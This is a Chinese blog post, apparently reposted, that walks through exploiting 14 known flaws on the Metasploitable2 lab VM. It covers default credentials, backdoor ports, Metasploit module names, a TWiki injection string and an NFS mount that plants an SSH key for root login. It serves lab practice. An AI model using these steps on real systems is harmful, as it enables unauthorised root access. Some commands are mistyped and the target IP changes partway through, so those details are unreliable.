linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
Metasploitable2靶机漏洞复现
1、TWiki 'rev' Parameter Arbitrary Command Execution
2、VNC Server 'password' Password
3、Ingreslock 后门漏洞
4、UnrealIRC
|
文章目录 Metasploitable2靶机漏洞复现 1、TWiki 'rev' Parameter Arbitrary Command Execution 2、VNC Server 'password' Password 3、Ingreslock 后门漏洞 4、UnrealIRCd Backdoor(ircd) 5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution 6、Tomcat管理台默认口令漏洞 7、MySQL弱密码登录 8、PostgreSQL弱密码登录 9、Distcc后门漏洞 10、vsftpd 2.3.4 后门漏洞 11、Druby 远程代码执行漏洞 12、Samba sysmlink 默认配置目录遍历漏洞 13、Samba MS-RPC Shell 命令注入漏洞 14、Linux NFS共享目录配置漏洞 Metasploitable2靶机漏洞复现 参考大佬: 环境:vmware虚拟机Metasploitable2环境 IP:192.168.72.130 1、TWiki ‘rev’ Parameter Arbitrary Command Execution 描述: rev参数可执行任意命令 验证: %20|pwd||echo
2、VNC Server ‘password’ Password 验证: vncviewer 192.168.72.130 Password: password
3、Ingreslock 后门漏洞 原理: Ingreslock后门程序监听1524端口linux漏洞,连接到1524端口就可以直接获取root权限。 端口: 1524 验证: telnet 192.168.72.130 1524 4、UnrealIRCd Backdoor(ircd) 端口: 6667 利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor
5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution CVE-2012-1823 利用模块: exploit/multi/http/php_cgi_arg_injection
6、Tomcat管理台默认口令漏洞 192.168.160.131:8180 tomcat/tomcat 7、MySQL弱密码登录 验证: mysql –h 192.168.160.131 –u root
8、PostgreSQL弱密码登录 postgres/postgres
9、Distcc后门漏洞 CVE-2004-2687 nmap扫描: 端口: 3632 利用模块: exploit/unix/misc/distcc_exec
10、vsftpd 2.3.4 后门漏洞 nmap扫描: 利用模块: exploit/unix/ftp/vsftpd_234_backdoor
11、Druby 远程代码执行漏洞 CVE-2013-0156(类似) 利用模块: exploit/linux/misc/drb_remote_codeexec 端口: 8787
12、Samba sysmlink 默认配置目录遍历漏洞 CVE-2010-0926 端口: 445 利用模块: auxiliary/admin/smb/samba_symlink_traversal set SMBSHARE tmp //设置SAM可写文件 在新窗口下打开上面生成的共享目录: smbclient //IP/tmp (不输入密码直接回车) cd rootfs ls
13、Samba MS-RPC Shell 命令注入漏洞 CVE-2007-2447 端口: 139 利用模块: exploit/multi/samba/usermap_script
14、Linux NFS共享目录配置漏洞 原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录
输入ssh-keygen 生成RSA公钥
依次输入: (1)mount –t nfs 192.168.160.131:/ /tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下; (2)cat/root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下; (3)sshroot@192.168.72.130,实现无密码登录
(编辑:滁州站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |















